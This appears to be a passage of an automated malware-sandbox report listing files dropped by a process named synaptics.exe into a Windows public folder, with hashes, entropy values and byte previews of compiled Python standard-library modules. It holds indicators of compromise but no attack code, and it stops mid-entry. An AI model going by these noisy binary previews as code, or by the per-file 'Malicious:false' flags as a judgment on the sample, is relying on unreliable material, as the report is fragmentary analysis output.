                                                                                                                                                                                      Preview:o........'-d\........................@...s4...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z.d.Z.d.Z d.Z!e.e.e.e.f.Z"e.e e!f.Z#d.d...Z$d.d...Z%G.d.d...d.e&..Z'G.d.d...d.e'..Z(G.d.d...d.e'..Z)e(..Z*e)..Z+G.d.d...d...Z,G.d.d...d.e,..Z-e-..Z.d.d...Z/e0e.d...r.e..1..e/..Z/G.d.d...d...Z2G.d.d...d...Z3G.d d!..d!e2..Z4G.d"d#..d#e2..Z5G.d$d%..d%e2..Z6G.d&d'..d'e...Z7G.d(d)..d)e&..Z8e.j9.:e8....G.d*d+..d+e8..Z;G.d,d-..d-e8..Z<G.d.d/..d/e8..Z=G.d0d1..d1e=e;..Z>G.d2d3..d3e=e<..Z?d.S.)4.....N)...Sequence)...EINVAL..ENOENT..ENOTDIR..EBADF..ELOOP)...attrgetter)...S_ISDIR..S_ISLNK..S_ISREG..S_ISSOCK..S_ISBLK..S_ISCHR..S_ISFIFO)...quote_from_bytes)...PurePath..PurePosixPath..PureWindowsPath..Path..PosixPath..WindowsPath......{...i....c....................C...s ...t.|.d.d...t.v.p.t.|.d.d...t.v.S.).N..errno..winerror)...getattr.._IGNORED_ERROS.._IGNORED_WINERRORS)...except
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):27442
                                                                                                                                                                                      Entropy (8bit):5.5904468658757756
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:fB4j93Ho+Dvz6WYt08jHUgRyRj4/ISTvI9nI6xk4laOXN4Ww:fB293oEbq089oRjnuunI6xs64F
                                                                                                                                                                                      MD5:9C44045E27B703DD587BA21D5F1AB6E8
                                                                                                                                                                                      SHA1:64B2BECA35332487D8808CAD39A3CC2B4056F41E
                                                                                                                                                                                      SHA-256:6FC6D0204E0E7C651F37DBD5856691A8F97C5DC28A0D97B7F8789A095813E60F
                                                                                                                                                                                      SHA-512:81232D31A22D42B2CF9CBD4FB7463AE61882F3C05B83D4FA9F9FF83ACBAA2636D5B5FBBE0966C60E73236E037EB6E83C1B582A7E89547F0C1FD5C427D2172433
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dH........................@...s....d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.d.d.d.d.d.d.d.d.d...Z.e...d...Z.d.d...Z.e...d.e.j...Z.d.d.d...Z.d.d.d...Z.e...d...Z.....d.d.d...Z.d.d.d.d.d.d.d d!d"d#d$d%..Z.d.d&d'd(d)d*d+..Z.d,d-..Z.d.d/..Z.d.d0d1..Z.d2d3..Z.d.d5d6..Z.d7d8..Z.d.d9d:..Z.d;d<..Z.d=d>..Z.d.d?d@..Z.dAdB..Z d.dCdD..Z!dEdFdGd...Z"e.j#d.d.f.dHdI..Z$dJdK..Z%G.dLdM..dM..Z&dNdO..Z'G.dPdQ..dQe..(dRdS....Z)d.a*dTdU..Z+dVdW..Z,dXdY..Z-dZd[..Z.d\d]..Z/d^d_..Z0d`da..Z1e...dbe.j...Z2e...dce.j...Z3e...dd..Z4e...de..Z5i.Z6d.dfdg..Z7dhdi..Z8djdk..Z9dldm..Z:dndo..Z;dpdq..Z<drds..Z=dtdu..Z>i.Z?d.dvdw..Z@e...dx..ZAe...dy..ZBdzZCd.aDd{d|..ZEd}d~..ZFeGd.k...rjd.e.jHv...pPd.e.jHv.ZId.e.jHv...o[d.e.jHv.ZJeKe@eJeI......e..Ld.....d.S.d.S.).a8... This module tries to retrieve as much platform-identifying data as. possible. It makes this information available via function APIs... If called from the command line, it prints the platform. information conca
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10543
                                                                                                                                                                                      Entropy (8bit):5.329830288433104
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:rhb0oiAyslc6Yc5JJ0kMz8g1z37oItrg2spGuDbTM0tNWCEZC:rhGALlTYc5JJ5Itr5spLbo0bdEZC
                                                                                                                                                                                      MD5:ED7B716AC49D014F45DB67389B884E17
                                                                                                                                                                                      SHA1:84BE6DCFFB42D7D23DDB93508F72711B7B1039B6
                                                                                                                                                                                      SHA-256:561092F9C0742C62FC028AEA5367683355F0C3ACDE2B82EEE391744791944779
                                                                                                                                                                                      SHA-512:39E8AAEE5B0E976D264FA65225164695F2C86C2A00C697A11D8D2ABDD24C77FB1C59FC77EF75118A8DCE351C2F43F5B2C9844C676802394635A94AA011E20609
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.A.......................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.j.e._.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.d#d$..Z.d.a.d.a.d%d&..Z.d'd(..Z.d)d*..Z d+d,..d-d...Z!d/d0..Z"e.j#d1k.Z$d6d2d3..Z%d4d5..Z&d.S.)7a....Common operations on Posix pathnames...Instead of importing this module directly, import os and refer to.this module as os.path. The "os.path" name is an alias for this.module on Posix systems; on other systems (e.g. Windows),.os.path provides the same operations in a manner specific to that.platform, and is an alias to another module (e.g. ntpath)...Some of this can actually be useful on non-Posix systems too, e.g..for manipulation of the pathname component of URLs.........../..:z./bin:/usr/binNz./dev/null.....)...*)&..normcase..isabs..join..splitdrive..split..splitext..basename..dirname..commonprefix..getsize..getmtime..getatime..getctime..islink..exis
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10805
                                                                                                                                                                                      Entropy (8bit):5.079570093380288
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:ru+pM4yfRWdufeC/PBbEy6LWf1eR/i9Z6/cWyfmrAX/I8:i+pMrQdufd/PBbEy6LWdeo9s/PyfmrCP
                                                                                                                                                                                      MD5:C48B7CDFD1CFA56D6EF1E7AED1C7824A
                                                                                                                                                                                      SHA1:F503E6ED09B6280337E6317635098CDD140F798B
                                                                                                                                                                                      SHA-256:23816DCA459DC697D02A4AD13630DC6060F16CD531425D91AF2AB09D83D13D1E
                                                                                                                                                                                      SHA-512:3C3972010B9218403909383BDD8852BEFDC6F49036EAFE16FD4D0CF46454FC443D51F24351D95D2C8821E162D26BD682EF8C78EF4836FB292D015FAD102D58C9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y1......d.Z.Y.n.w.g.d...Z.z.d.d.l.m.Z...W.n...e.yO......G.d.d...d.e...Z.Y.n.w.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.e.d.u.r~e.Z.d.S.d.S.).z'A multi-producer, multi-consumer queue......N)...deque)...heappush..heappop)...monotonic)...SimpleQueue)...Empty..Full..Queue..PriorityQueue..LifoQueuer....).r....c....................@........e.Z.d.Z.d.Z.d.S.).r....z4Exception raised by Queue.get(block=0)/get_nowait().N....__name__..__module__..__qualname__..__doc__..r....r.....)C:\Users\Public\QExvbmVOb25l\lib\queue.pyr...................r....c....................@...r....).r....z4Exception raised by Queue.put(block=0)/put_nowait().Nr....r....r....r....r....r........r....r....c....................@...s....e.Z.d.Z.d.Z.d!d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d"d.d...Z.d"d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5807
                                                                                                                                                                                      Entropy (8bit):5.454657646690387
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:kPp0xXxswv10Es2XWFP0nf5nizGJFNYTBTO7u10IbJJs5WkbtL4FRJpGyd/8tzOR:oqrswv2EGmxMGb+rIWkOFldkS
                                                                                                                                                                                      MD5:F93690DDE4BBA5A88DFFF80E29BD0AA5
                                                                                                                                                                                      SHA1:0859E3843F413E73E1DB95CC20DC272D99613E83
                                                                                                                                                                                      SHA-256:28D2B449A3FD21FB428B6B428D3B1CFC345BAAB8B9516D4818BEA30CC66C2AA9
                                                                                                                                                                                      SHA-512:A300CFAEF4EF83AD81511A9DC1C9A2480C742E9D1231CB20BFA73765587419CBB636DFBEE014D7B1DB87C2006F410F5EC14B502E48AA70D1C065BA258299F06B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dV........................@...s....d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z.z.d.d.l.m.Z.m.Z...W.n...e.y%......d.Z.d.Z.Y.n.w.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.k.rWe.....d.S.d.S.).zHConversions to/from quoted-printable transport encoding as per RFC 1521.)...encode..decode..encodestring..decodestring.....=.L...s....0123456789ABCDEF..........)...a2b_qp..b2a_qpNc....................C...sH...t.|.t...s.J...|.d.v.r.|.S.|.d.k.r.|.S.|.t.k.p#d.|.....k.o d.k.n.......S.).z.Decide whether a particular byte ordinal needs to be quoted... The 'quotetabs' flag indicates whether embedded tabs and spaces should be. quoted. Note that line-ending tabs and spaces are always encoded, as per. RFC 1521.. ..... ......_..... .....~)...isinstance..bytes..ESCAPE)...c..quotetabs..header..r.....*C:\Users\Public\QExvbmVOb25l\lib\quopri.py..needsquoting....s..............".r....c....................C...sB...t.|.t...r.t.|...d.k.s.J...t.|...}.t.t.t.|.d.....t.|.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):22761
                                                                                                                                                                                      Entropy (8bit):5.437346660850303
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:g151Eqqa1srwKCiPSFSU2hf9xjTW8tCX21XiF+2YSNJWQhkYM+CS:gzJKZCiRTLCX2B1UJWbYVCS
                                                                                                                                                                                      MD5:38B08542E21CD53FA1EDB606205C6669
                                                                                                                                                                                      SHA1:DE389E58E3865457046E40A92B6543C4711E6A43
                                                                                                                                                                                      SHA-256:E06D9AE871FA5F1D04671DFE5BF7ACF380F79DA78319447CC17A9CBDFEB561C8
                                                                                                                                                                                      SHA-512:05D245CD7E3FE449EE17F65CA013C466A06319AAF7F45F34D3CA2133C58AA505557326B3C7347B0C1C0E8EA2E62903A45134C649DB58E384564E10B88FF87DDA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dg........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z"m#Z$..d.d.l%m&Z'..d.d.l(m)Z*m+Z,..d.d.l-m-Z...d.d.l.Z/d.d.l0Z0z.d.d.l1m2Z1..W.n...e3ym......d.d.l4m2Z1..Y.n.w.g.d...Z5d.e.d.....e.d.....Z6e.d...Z7d.e.d.....Z8d.Z9d.e9....Z:d.Z;G.d.d...d.e0j<..Z<G.d.d...d.e<..Z=e<..Z>e>j?Z?e>j@Z@e>jAZAe>jBZBe>jCZCe>jDZDe>jEZEe>jFZFe>jGZGe>jHZHe>jIZIe>jJZJe>jKZKe>jLZLe>jMZMe>jNZNe>jOZOe>jPZPe>jQZQe>jRZRe>jSZSe>jTZTe>jUZUd.d...ZVd#d.d...ZWeXe/d ..r.e/jYe>j?d!....eZd"k...r.eW....d.S.d.S.)$a....Random variable generators... bytes. -----. uniform bytes (values between 0 and 255).. integers. --------. uniform within range.. sequences. ---------. pick random element. pick random sample. pick weighted random sample. generate random permutation.. distributions on the real line:. ------------------------------. unifor
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14240
                                                                                                                                                                                      Entropy (8bit):5.2132795076047325
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:EuPJsiNrHyou2OkRFvMKUryx95qoxS6MbZ:ECJssrSoVfRAry/5qoU6MbZ
                                                                                                                                                                                      MD5:39DCC135326C030CE0AF09FBE82CE3F4
                                                                                                                                                                                      SHA1:5B15DD97469A1D797C06C477EC03519ACF4E9DC5
                                                                                                                                                                                      SHA-256:6EAFAAFB0E609BA8A61F4C70CF6D2EE615ED1FD0DDBC10961ED52E17A80073C9
                                                                                                                                                                                      SHA-512:D30EBAA41C6D6F42E53C3DAD609425B90DF2517D26F2C8B07B9EC3BB6456E9F101D858E2428995791AF5CCB9E41405AFEBA173EC561A378F1593F8BF5470A88C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-ds?.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y#......d.Z.Y.n.w.g.d...Z.d.Z.G.d.d...d.e.j...Z.e.....e.j.....e.j.Z.d0d.d...Z.d0d.d...Z.d0d.d...Z.d1d.d...Z.d1d.d...Z.d1d.d...Z.d0d.d...Z.d0d.d...Z.d0d.d...Z.d.d...Z.d0d.d...Z.d.d...d.D...Z.d d!..Z.e.e...d"d.....Z.e.e...d"d.....d"....Z.i.Z.d#Z d$d%..Z!e.."e ..d&d'....Z#d(d)..Z$d*d+..Z%d.d.l&Z&d,d-..Z'e&.(e.e'e!....G.d.d/..d/..Z)d.S.)2a....Support for regular expressions (RE)...This module provides regular expression matching operations similar to.those found in Perl. It supports both 8-bit and Unicode strings; both.the pattern and the strings being processed can contain null bytes and.characters outside the US ASCII range...Regular expressions can contain both special and ordinary characters..Most ordinary characters, like "A", "a", or "0", are the simplest.regular expressions; they simply match themselves. You can.concatenate ordinary characters, so last matches the string 'last'...Th
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5263
                                                                                                                                                                                      Entropy (8bit):5.030955164289262
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:rdnTWdW9lUgN2VsfA2IywpvIyey0GtJAYKgl0Af6:dzDk52elT0c6Cg
                                                                                                                                                                                      MD5:2486C7811641EC4E949ABD6D9D61FD92
                                                                                                                                                                                      SHA1:963BC9E28601A76362A07860F82ABDCC8732EED8
                                                                                                                                                                                      SHA-256:815181D3EED57DA097A1FD7F3F0D16EFF89D49DCD131162E8A0B966323433EB8
                                                                                                                                                                                      SHA-512:BC00A6B366F18CEFF4C92BA6B6757C6DFE667AFB37B1C1AE54A8215EA94F9EFA023625B99D6D5D5A8DFB3AEA6681F0B42EFC13C6710BAB901CFFE4E49AB58C6A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d4........................@...s\...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.d...Z.G.d.d...d...Z.d.d...Z.e...Z.e.j.Z.d.S.).zGRedo the builtin repr() (representation) but with limits on most sizes.)...Repr..repr..recursive_repr.....N)...islice)...get_ident.....c........................s......f.d.d...}.|.S.).zGDecorator to make a repr function return fillvalue for a recursive callc........................sX...t...........f.d.d...}.t...d...|._.t...d...|._.t...d...|._.t...d...|._.t...d.i...|._.|.S.).Nc........................sJ...t.|...t...f.}.|...v.r...S.....|.....z...|...}.W.....|.....|.S.....|.....w...N)...idr......add..discard)...self..key..result)...fillvalue..repr_running..user_function...+C:\Users\Public\QExvbmVOb25l\lib\reprlib.py..wrapper....s......................z<recursive_repr.<locals>.decorating_function.<locals>.wrapper..__module__..__doc__..__name__..__qualname__..__annotations__)...set..getattrr....r....r....r....r....).r....r......r....).r....r....r......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17118
                                                                                                                                                                                      Entropy (8bit):5.1815230849873295
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:6jJ7Dm/9rSzUEok/L1xzQ8DdIE67SQSUQGJbvRkE4wSvBeL:6jJ7Dm/9rSzzBdIn7SQSkbvRkE4FvBeL
                                                                                                                                                                                      MD5:A5E8CDC77D5AD61A03A8C629C4E54EAC
                                                                                                                                                                                      SHA1:4FB8567DF71382A487FB231068004A752D5EEFFB
                                                                                                                                                                                      SHA-256:D1D78CC49B099ABA607A4588332842AD68A89DB313CAE0BEB81319886B9BD58A
                                                                                                                                                                                      SHA-512:7B5F6544E8A49295B3A1141B12D3C2ABAB64CC3FE22CB8322102E80F3D798FC501844D4A9F420F439103BB70F7F5A55CBA26D29E9FCEB879FA6A21F99ECECB28
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.N.......................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.d...Z.e.d.g.d.....Z.d.e._.e.j.d.k.rId.e.j._.d.e.j._.d.e.j._.d.e.j._.G.d.d...d.e...Z.G.d.d...d.e.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.d...r.G.d.d...d.e...Z.e.e.d ..r.G.d!d"..d"e...Z.e.e.d#..r.G.d$d%..d%e...Z.e.e.d&..r.G.d'd(..d(e...Z.d)d*..Z.e.d&..r.e.Z.d.S.e.d ..r.e.Z.d.S.e.d#..r.e.Z.d.S.e.d...r.e.Z.d.S.e.Z.d.S.)+z|Selectors module...This module allows high-level and efficient I/O multiplexing, built upon the.`select` module primitives.......)...ABCMeta..abstractmethod)...namedtuple)...MappingN..........c....................C...s`...t.|.t...r.|.}.n.z.t.|.......}.W.n...t.t.t.f.y"......t.d...|.....d...w.|.d.k.r.t.d...|.......|.S.).z.Return a file descriptor from a file object... Parameters:. fileobj -- file object or file descriptor.. Returns:. corresponding file descriptor.. Raises:. ValueError if the object is invalid. z.I
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7795
                                                                                                                                                                                      Entropy (8bit):5.512172106446463
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:dQrdt23n7mQxhSaL09FKXY5nzg9gn1yiEWE5cnPrrvX:KrsKb9FKo5zg9g1yLZ6Pf
                                                                                                                                                                                      MD5:ED168D357C03DC26539D6D968359834C
                                                                                                                                                                                      SHA1:2772B6B1F3DBBE21F41BE36C5FD6AF8A14251C3F
                                                                                                                                                                                      SHA-256:616593ABCAA088F46D0322565739FB6A55466F540C99C2B740AFA0A1D5DA73B8
                                                                                                                                                                                      SHA-512:8EB969239BEC3D7A1C30F3CD30D68249B59680A24F091E605D7A5933BFB5D9302BFB0D5315DFE3F8A5D95416C7A28D2E5AAD3FFDF35E13F1213CDBD0E2D25449
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.6.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d.d...Z.d.d...Z.e...d.e.j...j.Z.d.d...Z.d.d...Z.e.d.k.rse.e.j...d.k.rPe.e.......d.S.e.j.d...Z.e.e.....Z.e.e.e.e.......W.d.........d.S.1.slw.......Y...d.S.d.S.)..8A lexical analyzer class for simple shell-like syntaxes......N)...deque)...StringIO)...shlex..split..quote..joinc....................@...sv...e.Z.d.Z.d.Z.....d.d.d...Z.e.d.d.....Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.).r....r....NFc....................C...s....t.|.t...r.t.|...}.|.d.u.r.|.|._.|.|._.n.t.j.|._.d.|._.|.|._.|.r$d.|._.n.d.|._.d.|._.d.|._.|.j.r7|...j.d.7..._.d.|._.d.|._.d.|._.d.|._.d.|._.d.|._.t...|._.d.|._.d.|._.d.|._.t...|._.d.|._.|.sbd.}.n.|.d.u.rhd.}.|.|._.|.r.t...|._.|...j.d.7..._.|.j...t...|.....}.|.j...|...|._.d.S.d.S.).N....#Z?abcdfeghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_u|..............................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):38374
                                                                                                                                                                                      Entropy (8bit):5.531484846325215
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:C6QqETanIk41k7RiruyBW6rZiFuTPgtyQwye+idEd4jalseGehtq:C6QqEMIBddYATPgtyQwye+idEd4useGr
                                                                                                                                                                                      MD5:4EF34DB92E7BCC69DA9DD074935EC471
                                                                                                                                                                                      SHA1:608A4B93D92FABB2D0E7C1B79273B8D25E2E5C09
                                                                                                                                                                                      SHA-256:1D9F08B34BE1772C42A62E37A245E3C0B254D33B74E17BCEE6A01AD6394551F7
                                                                                                                                                                                      SHA-512:A919661B2FD8C86F31612DADDF37259D419F85E3AE70A287ED35BF38E01413A9D18576661B9981BC678AA6081D0E98E47E12AE04D10C317BC51DC568E4753136
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s"...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.[.d.Z.W.n...e.y.......d.Z.Y.n.w.z.d.d.l.Z.[.d.Z.W.n...e.yC......d.Z.Y.n.w.z.d.d.l.Z.[.d.Z.W.n...e.yX......d.Z.Y.n.w.e.j.d.k.Z.d...Z.Z.e.j.d.k.rld.d.l.Z.n.e.rrd.d.l.Z.e.rvd.n.d.Z.e.e.d...o.e.j...d...a.e.o.e.e.d...Z.d.Z.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e ..Z!G.d.d...d.e ..Z"d.d...Z#d.d...Z$e.f.d d!..Z%d.d"d#..Z&d$d%..Z'd&d'..Z(d(d)..Z)d.d*..d+d,..Z*d.d*..d-d...Z+e.e.d/....r.d.d*..d0d1..Z,n.d2d1..Z,d.d*..d3d4..Z-d.d*..d5d6..Z.d.d*..d7d8..Z/d9d:..Z0..d.d;d<..Z1d.d.e/d.d.f.d=d>..Z2e.e.j3d?....r@d@dA..Z4dBdC..Z5n.dDdA..Z4dEdC..Z5dFdG..Z6dHdI..Z7e.j8e.j.e.j9e.j:h.e.j;k...oje.j<e.j=v...oje.j.e.j>v.Z?d.dJdK..Z@e?e@_AdLdM..ZBe/f.dNdO..ZCdPdQ..ZDdRdS..ZEdTdU..ZFdVdW..ZG....d.dYdZ..ZH....d.d[d\..ZId]eHd^g.d_d.f.i.ZJe...r.eHd`g.dad.f.eJdb<.eIg.dcd.f.eJdd<.e...r.eHdeg.dfd.f.eJdg<.e...r.eHdhg.did.f.eJdj<.dkdl..ZKd.dndo..ZLdpdq..ZM
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2948
                                                                                                                                                                                      Entropy (8bit):4.8796788109167695
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:/ynPssxfA01vMnGjQQDGnvsSZdCztcKcynJyDywm18XQfkt+A7BN5XjyubuOAh:sUshAku4rGvsqG6PiJyDywmcQq+A7D5a
                                                                                                                                                                                      MD5:9913A4073B84AB819D9980F5EE50879B
                                                                                                                                                                                      SHA1:2ABE2F5F6B4EC691672976F39A34BC09F232AE67
                                                                                                                                                                                      SHA-256:10679BF423679AB3FD4025D6B248EF3D49A2F46A692AD41CC99DB4217E857DEB
                                                                                                                                                                                      SHA-512:493006FCD7C0909FB478E281E9E5E00B5B437C894E84F4322F6F625B31E82EAD0CB1228F6B3D04D9307798A2D2734CCB11B4307A3B0B65146FC59B59A4D8CBDA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.d.l.Z.d.d.l.T.d.d.l.m.Z...e...Z.e...d.e.d.d.......e...d.e.d.d.......d.e.v.r0e...d.e.d.d.......d.d...Z.d.d...Z.d.d...Z.e.e.j...d.d.....Z.e.e.j...d.d.....Z.d.e.v.r[e.e.j...d.d.....Z.d.e.v.rhe.e.j...d.d.....Z.d.e.v.rue.e.j...d.d.....Z.d.e.v.r.e.e.j...d.d.....Z.[.[.d.S.)......N)...*)...IntEnum..Signalsc....................C...s(...|.....r.|...d...o.|...d.....p.|...d...S.).NZ.SIGZ.SIG_Z.CTRL_)...isupper..startswith....name..r.....*C:\Users\Public\QExvbmVOb25l\lib\signal.py..<lambda>....s............r......Handlersc....................C........|.d.v.S.).N)...SIG_DFL..SIG_IGNr....r....r....r....r....r.................pthread_sigmaskZ.Sigmasksc....................C...r....).N).Z.SIG_BLOCKZ.SIG_UNBLOCKZ.SIG_SETMASKr....r....r....r....r....r........r....c....................C...s"...z.|.|...W.S...t.y.......|...Y.S.w.).zsConvert a numeric value to an IntEnum member.. If it's not a known member, return the numeric value itself.. )...ValueError)
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17393
                                                                                                                                                                                      Entropy (8bit):5.5105957286201
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:0lpvTn42l1QP47TUN1PirJtKA5y15/Jgt1nmKQ1ruVhY2lrD9bIhx/xAUu2n8/X1:yL42lug7TA1Pi9cA015hgt1nmlUvvlrx
                                                                                                                                                                                      MD5:451848F5112EEB17E11A3A9F9CB083D0
                                                                                                                                                                                      SHA1:C59424A76DA1BBAAB1DD2537126FF2AAFFCDE86A
                                                                                                                                                                                      SHA-256:896DC4932ADB45D2996028A2E12E342551CE61F7D47222355B592276ED8CD289
                                                                                                                                                                                      SHA-512:2B1B95F13F3B7D100043E2C2D810FFAB3A5DC43B2C29CD1C934C9959F129F22C83EA4FABC31E50EE512E2C2C111361484A6C739BDC9A9502C696389AB126280F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.e.j.g.a.d.a.d.a.d.a.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d4d.d ..Z.d!d"..Z.d#d$..Z.d%d&..Z.d'd(..Z.d)d*..Z.d+d,..Z d-d...Z!d/d0..Z"e.j#j$s.e"....d1d2..Z%e&d3k.r.e%....d.S.d.S.)5a....Append module search paths for third-party packages to sys.path...****************************************************************.* This module is automatically imported during initialization. *.****************************************************************..This will append site-specific paths to the module search path. On.Unix (including Mac OSX), it starts with sys.prefix and.sys.exec_prefix (if different) and appends.lib/python<version>/site-packages..On other platforms (such as Windows), it tries each of the.prefixes directly, as well as with lib/site-packages appended. The.resulting directories, if they exist, are appended to
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):28976
                                                                                                                                                                                      Entropy (8bit):5.535157918339055
                                                                                                                                                                                      Encrypted:false
